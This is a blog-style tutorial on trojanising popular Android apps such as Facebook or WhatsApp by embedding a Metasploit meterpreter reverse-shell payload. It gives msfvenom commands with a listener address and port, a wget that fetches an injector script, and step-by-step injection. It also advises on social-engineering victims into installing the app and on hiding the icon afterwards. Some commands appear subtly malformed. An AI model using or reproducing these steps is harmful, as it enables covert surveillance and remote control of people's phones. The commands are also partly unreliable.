How to inject malicious payloads to android application

Do you have a smart phone? Do you use apps? Well you are under attack. This tutorial will guide you through how easy it is to inject malicious payloads to well established applications and use them to spy on remote devices. This accompanies the talk I gave on Colombo Security Meetup.

Disclaimer: This is strictly for educational purposes only. I can not and will not be responsible for any damage caused using any of these methods.

Skip ahead if you want to get to the tutorial instead of the writeup.

Can mobile phones be hacked?

Mobile phones has lots of capabilities including sending SMS, taking calls as well as taking photos, videos and record audio. Device OS usually exposes most of these functionality as an API to applications to use. This malicious payload will use that APIs and send these details to a remote intruder via reverse shell. This is similar to writing an custom application to get these details from the mobile phone. Only difference is this is already written and can be used and has a reverse shell which you can use to connect back anytime.

The technique illustrated here is only applicable to android phones. It uses the standard device api methods to access the functionality exposed by the phone. This method requires attacker installing and malicious version of an application in the target mobile phone.

Requirements

  • Android phone
  • A machine with a public IP address with Metaexploit installed (or via docker).

I will be using Metaexploit via Docker.

Find a target application

This will be the application that you are going to inject your malicious payload. You can use any application for this. A good target would be applications Facebook, Instagram as the original application already requires permissions like accessing camera or it will be legit from the victims point of view since you are not requesting any additional permissions. You can download apks from APKMirror or APKPure.com or any other means. Following steps will assume the apk is downloaded and is available as original.apk in the current path.

Generate payload application

Following command will mount the host file system at /tmp/test to guest system at /tmp/test. msfvenom is used to generate the meterpreter payload as an android application with the LHOST and LPORT.

docker run \
--rm \
-v /tmp/test:/tmp/test \
-it metasploitframework/metasploit-framework \
./msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk

Replace the ip address with the ip address of the machine you will run your handler and the port.

This will generate a bare application that will give access to all the functionality we need via reverse shell. There are other payloads available for android as well.

Inject into another application

If you distribute this app, almost always this will be detected and prevent you from installing. What you need is another application that users use and inject this application into it. For example a well used application like Facebook or Whatsapp can be used as a container application. On the target phone it will provide the full functionality of the container application and under the hood it will also setup a metepreter as well.

If you have metasploit installed in your local machine, we can try using the msfvenom to inject it as well.

msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk
-x /tmp/test/authentic.apk

If you are using docker this will fail and use the following method instead.

There are few things involved in injecting a script.

  1. Download the shell script from
wget https://raw.githubusercontent.com/udnisap/apkinjector/master/apkinjector -o /tmp/test/apkinjector

2. Run a container with Java

# Docker with openjdk
docker run \
-v /tmp/test:/tmp/test \
--rm \
-it openjdk bash

3. Inject the payload to the target application

cd /tmp/test
./apktool ./exploited.apk ./authentic.apk

4. The above script might ask few prompts and after that your injected_authenitic.apk will be available in the host machine at /tmp/test/injected_authentic.apk.

Distribute Malicious application

There are number of ways you can use to distribute this app with the victim. If you managed to get hold of the victims phone you can simply install this. Typical social engineering pattern is you claims to provide additional functionality or an unlocked feature that is not available in the original application under normal app store version. In some cases, since some applications are not available in some regions, it can also be a selling point.

If you managed to get the app installed, with the reverse shell you can hide the application from the main menu which will only be visible if the user checks individual apps installed.

Are you an victim?

Well there is no easy way to figure out all the applications you have are legit applications. But what you can do is simply uninstall all the applications and reinstall applications from the app store. If you have adb installed